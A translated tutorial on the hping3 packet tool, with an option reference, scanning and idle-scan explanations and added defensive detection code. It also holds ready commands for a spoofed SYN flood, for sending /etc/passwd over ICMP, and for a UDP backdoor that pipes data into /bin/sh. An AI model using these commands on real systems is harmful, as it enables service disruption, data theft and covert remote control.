

hping is an open source tool for generating and parsing TCP/IP protocol packets. Its creator is Salvatore Sanfilippo. The latest version is hping3, which supports Tcl scripts that invoke its API automatically. hping is a standard tool for security auditing, firewall testing and similar work. Its advantage is that every part of a packet can be customized, so users can flexibly probe a target machine in detail.


yum install libpcap-devel tcl-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install


-h --help: Show help.
-v --version: Show version information.
-c --count count: The number of packets to send. The related COUNTREACHED_TIMEOUT value can be edited in hping2.h.
-i --interval: The packet delivery interval (in milliseconds); the default is 1 second. This option is important for increasing transmission rates and is also used in idle / spoofing scans. Refer to hping-howto for more information.
--fast: Sends 10 packets a second.
-n --numeric: Numeric output; host addresses are not shown as symbolic names.
-q --quiet: Quiet mode.
-I --interface interface name: The interface to use, for example eth0.
-V --verbose: Displays a lot of information. A TCP response generally looks like this:
len=46 ip= flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug: Debug mode. When you encounter something unfamiliar with hping, you can use this mode to modify hping (interface detection, data link layer access, interface settings, ...).
-z --bind: Bind a shortcut key.
-Z --unbind: Remove the shortcut key binding.
-0 --rawip: RAW IP mode. In this mode, hping sends the IP header with data.
-1 --icmp: ICMP mode. In this mode hping sends ICMP echo requests; you can send other types / codes of ICMP messages using the --icmptype and --icmpcode options.
-2 --udp: UDP mode. By default, hping sends UDP messages to port 0 of the host; use the --baseport, --destport and --keep options to change this.
-9 --listen signature: hping's listen mode. In this mode, hping receives the specified data.
-a --spoof hostname: Use a faked source IP. The firewall will not record your real IP, and of course you will not receive the reply packets.
-t --ttl time to live: Specify the TTL value of the packet.
-H --ipproto: Choose the IP protocol in RAW IP mode.
-W --winid: UNIX and Windows handle the ID differently; this option makes the ID handling the same as Windows.
-r --rel: Changes how the ID is output, showing relative ID values, as described in hping-howto.
-f --frag: Fragments the packets, which can test how the other side handles packet fragmentation. The default "virtual MTU" is 16 bytes.
-x --morefrag: Sends fragments to keep the host busy reassembling them, which causes a denial of service on the host.
-y --dontfrag: Sends IP packets that may not be fragmented, which lets you learn more about path MTU discovery.
-g --fragoff fragment offset value: Set the fragment offset.
-m --mtu mtu value: With this option, the ID value becomes very large: 50000, versus about 3000-20000 when the option is not specified.
-G --rroute: Record route. Shows the route in detail, through up to nine hops, even if the host blocks ICMP packets.
-C --icmptype type: Specify the ICMP type; the default is ICMP echo request.
-K --icmpcode code: Specify the ICMP code number; the default is 0.
--icmp-ipver: Sets the IP version inserted into the IP header.
--icmp-iphlen: Sets the length of the IP header; the default is 5 (32 bytes).
--icmp-iplen: Sets the length of the IP packet.
--icmp-ipid: Sets the ID of the IP header in the ICMP message; the default is random.
--icmp-ipproto: The default is TCP.
--icmp-cksum: Set the checksum.
--icmp-ts: Alias for --icmptype 13 (to send ICMP timestamp requests).
--icmp-addr: Alias for --icmptype 17 (to send ICMP address mask requests).
-s --baseport source port: hping uses the source port to match up the packets that respond. It counts from a base port, and for each packet received the port is incremented by 1; you can define the base port yourself.
-p --destport [+][+]dest port: Sets the destination port; the default is 0. With one plus sign, the port is incremented by 1 each time a reply to a sent packet arrives; with two plus signs, the port is incremented by 1 for each packet sent.
--keep: As mentioned above.
-w --win: The window size, 64 bytes.
-O --tcpoff: Set a fake TCP data offset. The normal data offset is tcphdrlen / 4.
-M --tcpseq: Sets the TCP sequence number.
-L --tcpack: Sets the TCP ack.
-Q --seqnum: Collects sequence numbers, which is very helpful for analyzing TCP sequence numbers.


Typical uses of hping3 include the following:

Firewall test

Use Hping3 to specify various packet fields, and then test the firewall in detail. Please refer to:

Test how the firewall responds to ICMP packets, whether it supports traceroute, whether a port is open, and how it handles DoS attacks. For example, test the target firewall with a Land attack (a Land attack sets the source address to the same address as the target, enticing the target machine to keep building connections with itself).

hping3 -S  -c 1000000 -a -p 21

Port scan

hping3 can also scan the target's ports. It supports specifying TCP flag bits, length and so on. The following example can be used to detect whether port 80 of the target machine is open:

hping3 -I eth0  -S -p 80

Here, -I eth0 specifies the eth0 interface, -S sets the SYN flag bit of the TCP packet, and -p 80 specifies the destination port of the probe.

hping3 supports a very rich set of port detection modes. It supports almost all of nmap's scan modes (except connect mode: because hping3 only sends and receives packets and does not maintain connections, connect-mode detection is not supported). Moreover, hping3 gives more precise control over the probes that are sent, which lets the user fine-tune the detection results. Of course, the port scan performance and overall processing capability of hping3 cannot be compared with Nmap's. In general, it is used only to scan a few ports on a small number of hosts.


Idle Scanning is an anonymous way to scan remote hosts. It was invented by Salvatore Sanfilippo, the author of hping3, and is currently implemented in Nmap.

The scanning principle is as follows. Find an idle host (one that has no network traffic and whose IPID grows one by one). The attacker host first sends a probe packet to the idle host and gets its IPID from the reply packet. Then, using the idle host's IP address as the source, a packet (assumed here to be a SYN packet) is sent to the port of the remote host. If the destination port of the remote host is open, it replies with SYN/ACK, and the idle host replies with an RST packet when it receives the SYN/ACK. The attacker host then sends another probe packet to the idle host to get its IPID again. By comparing the two IPID values, we can determine whether the remote host responded to the packet, and thus indirectly infer the status of its port.
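The principle above depends on the idle host using a predictable, globally incrementing IPID. The following added example (not part of the original article) shows how to audit hosts you operate for that property from a series of IPID values read out of probe replies; the function names, the max_step threshold and the sample values are assumptions made for illustration.

```python
from typing import List

def ipid_deltas(ids: List[int]) -> List[int]:
    """Differences between consecutive samples, modulo 2**16 (the field wraps)."""
    return [(b - a) & 0xFFFF for a, b in zip(ids, ids[1:])]

def classify_ipid(ids: List[int], max_step: int = 16) -> str:
    """Classify IPID behaviour seen in replies to evenly spaced probes.

    constant    - the same value in every reply
    incremental - small positive steps: a shared counter that reveals how
                  many packets the host sent between two probes
    random      - anything else; gives no usable side channel
    """
    if len(ids) < 3:
        raise ValueError("need at least 3 samples")
    deltas = ipid_deltas(ids)
    if all(d == 0 for d in deltas):
        return "constant"
    if all(0 < d <= max_step for d in deltas):
        return "incremental"
    return "random"

def leaked_packet_counts(ids: List[int]) -> List[int]:
    """For an incremental host: packets it sent between probes, not counting
    the one reply to our own probe. Non-zero values are what an observer
    would read as 'the host answered someone else'."""
    return [d - 1 for d in ipid_deltas(ids)]

# Constructed sample series (not captured from a real host).
WRAPPING = [65533, 65534, 65535, 0, 1]       # counter wrapping past 65535
BUSY = [100, 101, 103, 104]                  # one extra packet in the middle
RANDOMIZED = [4211, 60012, 318, 25990]

if __name__ == "__main__":
    for name, series in [("wrapping", WRAPPING), ("busy", BUSY),
                         ("randomized", RANDOMIZED)]:
        print(name, classify_ipid(series))
    print(leaked_packet_counts(BUSY))
```

A host classified as incremental is usable as the idle host in the scheme described above; randomized or constant IPID generation removes the side channel.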

Denial of service attack

Denial of service attacks are easy to build with hping3. For example, initiate a large number of SYN connections to the target machine with a falsified source address, sending one SYN packet every 1000 microseconds.

hping3 -I eth0 -a192.168.10.99 -S -p 80 -i u1000

Other attacks such as Smurf, teardrop, land attack and so on are also easy to build.  
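On the defending side, both the Land attack from the firewall test section and the SYN flood above leave a simple signature in packet records. The following is an added example, not part of the original article, of detection logic for the two; the record fields, the window and threshold values and the sample capture are constructed assumptions.

```python
from collections import defaultdict, deque

def land_packets(packets):
    """Packets whose source address equals their destination address."""
    return [p for p in packets if p["src"] == p["dst"]]

def syn_flood_alerts(packets, window_us=1_000_000, threshold=100):
    """Return (ts_us, dst, dport) each time the number of bare SYNs sent to one
    service inside the sliding window first reaches the threshold."""
    recent = defaultdict(deque)   # (dst, dport) -> timestamps inside the window
    active = set()                # services currently in alert state
    alerts = []
    for p in sorted(packets, key=lambda p: p["ts_us"]):
        if p["flags"] != "S":     # only SYN without ACK
            continue
        key = (p["dst"], p["dport"])
        q = recent[key]
        q.append(p["ts_us"])
        while p["ts_us"] - q[0] > window_us:
            q.popleft()
        if len(q) >= threshold and key not in active:
            active.add(key)
            alerts.append((p["ts_us"], *key))
        elif len(q) < threshold:
            active.discard(key)
    return alerts

def constructed_capture():
    """Constructed sample: 500 SYNs 1000 microseconds apart from one source,
    three ordinary SYNs to another port, and one land packet."""
    pkts = [{"ts_us": i * 1000, "src": "192.168.10.99", "dst": "10.0.0.5",
             "dport": 80, "flags": "S"} for i in range(500)]
    pkts += [{"ts_us": i * 400_000, "src": "10.0.0.20", "dst": "10.0.0.5",
              "dport": 443, "flags": "S"} for i in range(3)]
    pkts.append({"ts_us": 250_500, "src": "10.0.0.5", "dst": "10.0.0.5",
                 "dport": 21, "flags": "S"})
    return pkts

if __name__ == "__main__":
    capture = constructed_capture()
    print(syn_flood_alerts(capture))
    print(land_packets(capture))
```

Because the source address in such a flood is falsified, the alert is keyed on the destination service rather than on the sender.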

File transfer

hping3 supports file transfer through TCP/UDP/ICMP and other packets. This is equivalent to establishing a covert tunnel with the help of TCP/UDP/ICMP packets. It is implemented by opening a listening port and parsing the content that follows the detected signature (a string specified by the user). Start the service at the receiving end:

hping3 signature --safe  --icmp

This listens for the signature in ICMP packets and extracts the file content according to the signature.

At the sender, send the file in ICMP packets that carry the signature:

hping3 -d 100 --sign signature --file /etc/passwd

This passes the password file /etc/passwd to the host through ICMP packets. The size of the packet data is 100 bytes (-d 100) and the signature sent is signature (--sign signature).
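A transfer like this can be spotted on the wire because every packet's data begins with the same user-chosen string while the rest changes. The following added example (not part of the original article) flags such flows among ICMP echo requests; it assumes the signature sits at the start of each packet's data, and the tuple layout, thresholds and sample payloads are constructed for illustration.

```python
from collections import defaultdict

def common_prefix(payloads):
    """Longest byte prefix shared by every payload in the list."""
    low, high = min(payloads), max(payloads)
    n = 0
    while n < len(low) and low[n] == high[n]:
        n += 1
    return low[:n]

def printable_run(data):
    """Leading run of printable ASCII bytes."""
    n = 0
    while n < len(data) and 0x20 <= data[n] < 0x7F:
        n += 1
    return data[:n]

def signed_flows(echo_requests, min_packets=3, min_token=4):
    """echo_requests: (src, dst, payload) tuples taken from ICMP echo requests.
    Returns {(src, dst): token} for flows whose payloads all begin with the
    same printable token while the bytes after it differ between packets."""
    flows = defaultdict(list)
    for src, dst, payload in echo_requests:
        flows[(src, dst)].append(payload)
    hits = {}
    for flow, payloads in flows.items():
        if len(payloads) < min_packets:
            continue
        token = printable_run(common_prefix(payloads))
        tails = {p[len(token):] for p in payloads}
        # A stock ping repeats one payload, so it has a single tail.
        if len(token) >= min_token and len(tails) > 1:
            hits[flow] = token
    return hits

def constructed_requests():
    """Constructed payloads: a fixed-pattern ping and a signed transfer."""
    fixed = b"abcdefghijklmnopqrstuvwabcdefghi"
    chunks = [b"line one", b"next line", b"final line"]
    reqs = [("10.0.0.3", "10.0.0.9", fixed) for _ in range(4)]
    reqs += [("10.0.0.7", "10.0.0.9", b"signature" + c) for c in chunks]
    return reqs

if __name__ == "__main__":
    print(signed_flows(constructed_requests()))
```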

Trojan horse function

If hping3 can be started on a remote host, it can be used as a Trojan that listens on a port and opens shell communication after a connection is established. This is similar to netcat's backdoor function.

Example: listen on local port 53 (the DNS resolution service port) for packets from the host that contain the signature, and pass the received data to /bin/sh.

On the Trojan side, start:

hping3 signature --safe --udp -p 53 | /bin/sh

At the remote control terminal:

echo ls >test.cmd
hping3 -p53 -d 100 --udp --sign signature --file ./test.cmd

This sends the file containing the ls command, with the signature signature, to UDP port 53 of the host; the packet data length is 100 bytes.

Of course, this is just a simple demo. In a real-world scenario, the control side can use the shell to perform many more advanced and complex operations.
